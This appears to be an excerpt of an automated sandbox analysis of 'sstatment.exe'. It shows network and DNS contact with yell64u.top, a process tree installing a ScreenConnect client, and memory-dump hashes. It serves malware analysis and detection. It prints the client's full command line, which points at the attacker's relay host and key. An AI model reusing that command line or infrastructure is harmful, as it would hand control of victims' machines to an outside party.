                                                                                  OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 15, 2024 19:20:07.771992922 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:07.777002096 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:07.777957916 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:09.013226032 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:09.018479109 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:09.329220057 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:09.366509914 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:09.371493101 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:09.691298008 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:09.705992937 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:09.706060886 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:10.609119892 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:10.609163046 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:20:10.614202023 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:10.614214897 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:10.614223957 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:10.614231110 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:10.614238977 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:11.724060059 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:20:11.799412966 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:21:11.736869097 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:21:11.745641947 CEST88804973185.239.34.190192.168.2.4
                                                                                  Oct 15, 2024 19:22:11.752692938 CEST497318880192.168.2.485.239.34.190
                                                                                  Oct 15, 2024 19:22:11.757548094 CEST88804973185.239.34.190192.168.2.4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 15, 2024 19:20:07.099672079 CEST6234553192.168.2.41.1.1.1
                                                                                  Oct 15, 2024 19:20:07.734087944 CEST53623451.1.1.1192.168.2.4
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 15, 2024 19:20:07.099672079 CEST192.168.2.41.1.1.10xc26aStandard query (0)yell64u.topA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 15, 2024 19:20:07.734087944 CEST1.1.1.1192.168.2.40xc26aNo error (0)yell64u.top85.239.34.190A (IP address)IN (0x0001)false

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:13:20:00
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Users\user\Desktop\sstatment.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\sstatment.exe"
                                                                                  Imagebase:0xa00000
                                                                                  File size:5'652'448 bytes
                                                                                  MD5 hash:9ABA870D429CB8FA53103AE4B7182AF6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1716168698.00000000054E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1703239568.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:13:20:00
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:13:20:01
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7e34e0000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:13:20:01
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE C
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:13:20:01
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                  Imagebase:0xb30000
                                                                                  File size:61'440 bytes
                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:13:20:03
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:13:20:03
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:13:20:03
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c="
                                                                                  Imagebase:0x550000
                                                                                  File size:95'520 bytes
                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:13:20:05
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User"
                                                                                  Imagebase:0xb50000
                                                                                  File size:601'376 bytes
                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:9
                                                                                  Start time:13:20:08
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System"
                                                                                  Imagebase:0xe10000
                                                                                  File size:601'376 bytes
                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Reset < >
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C8${/
                                                                                    • API String ID: 0-4231431693
                                                                                    • Opcode ID: cc0b7802cf84aaf67cbe445a1e2a66c8adf228d216f85add62eb11e07f9d7fb2
                                                                                    • Instruction ID: 7bf49db2787f5d4598c191ffadc61df8ff863d61a9f926761c21922296327e2d
                                                                                    • Opcode Fuzzy Hash: cc0b7802cf84aaf67cbe445a1e2a66c8adf228d216f85add62eb11e07f9d7fb2
                                                                                    • Instruction Fuzzy Hash: 1161C5313506014FC709EB7AD8956AEF7E6EBCA7107518226E426C7358EF70ED4687A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (bq$Hbq
                                                                                    • API String ID: 0-4081012451
                                                                                    • Opcode ID: 0aaf0b35582f4e3bd40da5cb7cdbe0411b010d37e068e9aa8b24a5a44fa6cac2
                                                                                    • Instruction ID: 8ee2e44730e5c69b058228f5769bf51c43000c396a63a626ebe133729e7f4e58
                                                                                    • Opcode Fuzzy Hash: 0aaf0b35582f4e3bd40da5cb7cdbe0411b010d37e068e9aa8b24a5a44fa6cac2
                                                                                    • Instruction Fuzzy Hash: 8D419A36B046498FCB089F79C49466EBBB6FF85350B14846AE806DB385DF34ED058BA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (bq
                                                                                    • API String ID: 0-149360118
                                                                                    • Opcode ID: 40700fbaf37eb981dfe794f766908320a84a1c7279fc839e6bf2f18e0e576227
                                                                                    • Instruction ID: 2a399710690496edd2d0ecff0cbe06e6888e5ef46517dafdf2ec9a285934d935
                                                                                    • Opcode Fuzzy Hash: 40700fbaf37eb981dfe794f766908320a84a1c7279fc839e6bf2f18e0e576227
                                                                                    • Instruction Fuzzy Hash: 1E61F834B106069FCB14DF69D894A6EBBB2FF8D314B1181A8E546AB365DB34EC02CB41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Te^q
                                                                                    • API String ID: 0-671973202
                                                                                    • Opcode ID: 7da3298e7f59b7477cd1f4b13e5084e74b5315c9b368ae8987396fd77ca0777b
                                                                                    • Instruction ID: 2786df974be2ba6e1dead23b4cb13f900de4f55d850e3db80ab68378310092cc
                                                                                    • Opcode Fuzzy Hash: 7da3298e7f59b7477cd1f4b13e5084e74b5315c9b368ae8987396fd77ca0777b
                                                                                    • Instruction Fuzzy Hash: CE311B70600B418FC734DF69D984A5AF7F2FF88324B104B29E4A6877A5DB30E949CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: K]
                                                                                    • API String ID: 0-3798347547
                                                                                    • Opcode ID: 5845385edcea6e2c0f95f6301977fec07ed7908dc294eff36d0d4f148059240e
                                                                                    • Instruction ID: b144f032e3784cd62971345f0e5fe776273d66e73bb20408fc7238bb2d132af8
                                                                                    • Opcode Fuzzy Hash: 5845385edcea6e2c0f95f6301977fec07ed7908dc294eff36d0d4f148059240e
                                                                                    • Instruction Fuzzy Hash: 54215C75B002009FCB04DF79D48569EFBF2EF89290305C46AE80ADB36AEA34DD058B61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (bq
                                                                                    • API String ID: 0-149360118
                                                                                    • Opcode ID: 8f45923deb5c4133acb0d45cefb485048fa8bef0775ffac5fa294c412aecc5c0
                                                                                    • Instruction ID: f423017383afd536f967f6595efb7195f849fdfa3445c03d9a2cf2ba88f2c714
                                                                                    • Opcode Fuzzy Hash: 8f45923deb5c4133acb0d45cefb485048fa8bef0775ffac5fa294c412aecc5c0
                                                                                    • Instruction Fuzzy Hash: 6911BE763042408FCB15DB69D480A6ABBF3EFCD260751806AE45ACB351DF30EC01CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: K]
                                                                                    • API String ID: 0-3798347547
                                                                                    • Opcode ID: 052d21aa0bdde9a2a1f89a3634fb6c868bacd65b04376884bb7aa4f9d2facc55
                                                                                    • Instruction ID: 100889f60acff42234859b7e7186c53e7d8420c0ccfc0412bcd7df5dc29c7fba
                                                                                    • Opcode Fuzzy Hash: 052d21aa0bdde9a2a1f89a3634fb6c868bacd65b04376884bb7aa4f9d2facc55
                                                                                    • Instruction Fuzzy Hash: 62114F317002019F8B04DF69D4C5A6EFBE6EF85290745C56AF80ACB359EB34DD058B60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (bq
                                                                                    • API String ID: 0-149360118
                                                                                    • Opcode ID: d14fd87872ed72b69acbcfe9a21d4d994b161848864f5819b9f6bf139c1bd53f
                                                                                    • Instruction ID: 9728e78b53cbad1c89c913c6e092d0932eafc48d21961a23746227b8a39b3ff3
                                                                                    • Opcode Fuzzy Hash: d14fd87872ed72b69acbcfe9a21d4d994b161848864f5819b9f6bf139c1bd53f
                                                                                    • Instruction Fuzzy Hash: 12118C753002019FCB18DB6DD884A2ABBE7EBCD260765842AE45ADB350DF31EC01CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Te^q
                                                                                    • API String ID: 0-671973202
                                                                                    • Opcode ID: 90b051850023d48d51e07ba5cf851265f8d234505945b3e2a62ce4159f040592
                                                                                    • Instruction ID: 86f45ed604a1428d0b39ce29cc8b5015cb811a2c34b290d66e04ae08a32e4c23
                                                                                    • Opcode Fuzzy Hash: 90b051850023d48d51e07ba5cf851265f8d234505945b3e2a62ce4159f040592
                                                                                    • Instruction Fuzzy Hash: 18F02B767002045FC715DB69DD90A7AFBAAEFC9310B54856AE909CB395CD32DC0687F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e19759ea812b501e83c7a6e8ac7b86beb4cb888baaeebe728267e145689fb890
                                                                                    • Instruction ID: f20bfff9579ca60a7cf2504eff6c0524446fe1a38e824e7274f3835d5b710564
                                                                                    • Opcode Fuzzy Hash: e19759ea812b501e83c7a6e8ac7b86beb4cb888baaeebe728267e145689fb890
                                                                                    • Instruction Fuzzy Hash: 49E14035A0560ADFCF01CFA8C9809AEBBB6FF49314B148459E945EB361DB31ED16CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 622cff52ced7aaf76f4d74f633abedc4780dc335aeaaaa66210cbc9045b77991
                                                                                    • Instruction ID: 294e085579d231e05b4a6acdbc5a63a6ec45c8ce2cea4ce3ef6b33ee85265863
                                                                                    • Opcode Fuzzy Hash: 622cff52ced7aaf76f4d74f633abedc4780dc335aeaaaa66210cbc9045b77991
                                                                                    • Instruction Fuzzy Hash: 97813A74B402059FCB15DFA9D599A6EBBF2EB88300B108529E516DB3A4DF70EC06CF41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a9b185fe943f51a467819aa5b3969d69b40f86c6b0f05d0f5241fe797ef0a4a
                                                                                    • Instruction ID: bc70f06ca15173cc9a3d7ff90bb87a2d07670160c84c5557c92ef37956bba70a
                                                                                    • Opcode Fuzzy Hash: 7a9b185fe943f51a467819aa5b3969d69b40f86c6b0f05d0f5241fe797ef0a4a
                                                                                    • Instruction Fuzzy Hash: 25911A30A003058FCB15DFA9D49469EBBF6EF89310B54866AE8169F358DF70AD46CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9457d1fc5da2d553762cae42869ec0df275ec576c38fbd31001b3e1de707bcbb
                                                                                    • Instruction ID: c3a831619f3ee87c7d6878f66c1562ef51091da56de039e8f7cec13372b2ad2b
                                                                                    • Opcode Fuzzy Hash: 9457d1fc5da2d553762cae42869ec0df275ec576c38fbd31001b3e1de707bcbb
                                                                                    • Instruction Fuzzy Hash: A6810A74B402099FCB15DFA9D598A6EBBF2EB88300B108529E516DB394DF70EC46CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 980755f8c17d5babe88991301c16218ed418546804286f75126bd66c87e3caf3
                                                                                    • Instruction ID: c2d4111d3a5a1e67ff265d8be0db4f8b19dea7895c84dee9093ed798f7838444
                                                                                    • Opcode Fuzzy Hash: 980755f8c17d5babe88991301c16218ed418546804286f75126bd66c87e3caf3
                                                                                    • Instruction Fuzzy Hash: 70617A31B006058FCB09DF69D8945AEBBF6EFC9610729856AE40AEB351DF31ED05CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d27b3f490f850c946304878d2cf4e4c9ac134bcc51649b86b9c2518199f1d14
                                                                                    • Instruction ID: 0563c5a60dfcdd9680f042e84c6d1b9320e0e059b6d32118adf06f28ce81e639
                                                                                    • Opcode Fuzzy Hash: 4d27b3f490f850c946304878d2cf4e4c9ac134bcc51649b86b9c2518199f1d14
                                                                                    • Instruction Fuzzy Hash: CE610E386106048FCB50DF69C9889AEBBF6FF8871471585A9E51ADB731EB30EC05CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4bc87b887e0bf752f89c86bda90f54e2093df6038151b07f720f27bc5f7d9d4b
                                                                                    • Instruction ID: 33c0b726618342602fcf254befc6a0756019764f36355bf98ca5f9a14f582a03
                                                                                    • Opcode Fuzzy Hash: 4bc87b887e0bf752f89c86bda90f54e2093df6038151b07f720f27bc5f7d9d4b
                                                                                    • Instruction Fuzzy Hash: 6E513C75A10615CFCB04CFA9C88499DBBF6FF8A700B2581AAE505EF361DB71AD45CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7316c9af632ca5806f37f6eb85b81804545b9fd8a77315e38cc840dbfaff1e48
                                                                                    • Instruction ID: 9f6ecdd2cdf504adfb8efb042d906f6c23bd47ae7a162b8a42e8fb985639c4bf
                                                                                    • Opcode Fuzzy Hash: 7316c9af632ca5806f37f6eb85b81804545b9fd8a77315e38cc840dbfaff1e48
                                                                                    • Instruction Fuzzy Hash: 4F61FD38610A048FCB50DF69C9889AEBBF6FF8871471185A9E51ADB735DB30EC05CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cadf64d7d3e175ceec807ca4d0e8e28e68a54f859d8674ba3d56228088ff0264
                                                                                    • Instruction ID: 34cc8991e226d771a573f6b920da004e6246727378d8f148c711fd825a149da5
                                                                                    • Opcode Fuzzy Hash: cadf64d7d3e175ceec807ca4d0e8e28e68a54f859d8674ba3d56228088ff0264
                                                                                    • Instruction Fuzzy Hash: 5B516E30E103099FDB05DFB5D888BDDBBB2FF89300F108659E104AB295DB75A985CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4dbc317790ee3343c3b05ca85cd46fb859d9f6658a0ce6e906b00e8155928acd
                                                                                    • Instruction ID: 761e671b2150e196500c10245bd500b3c3f8b29b397ee6f83718ed607b5d6c2c
                                                                                    • Opcode Fuzzy Hash: 4dbc317790ee3343c3b05ca85cd46fb859d9f6658a0ce6e906b00e8155928acd
                                                                                    • Instruction Fuzzy Hash: 9B512B30700605CFCB18CF29D8D8A6A7BB5EF89325B0445A8D856DF3A9DB34E856CF91
                                                                                    Memory Dump Source
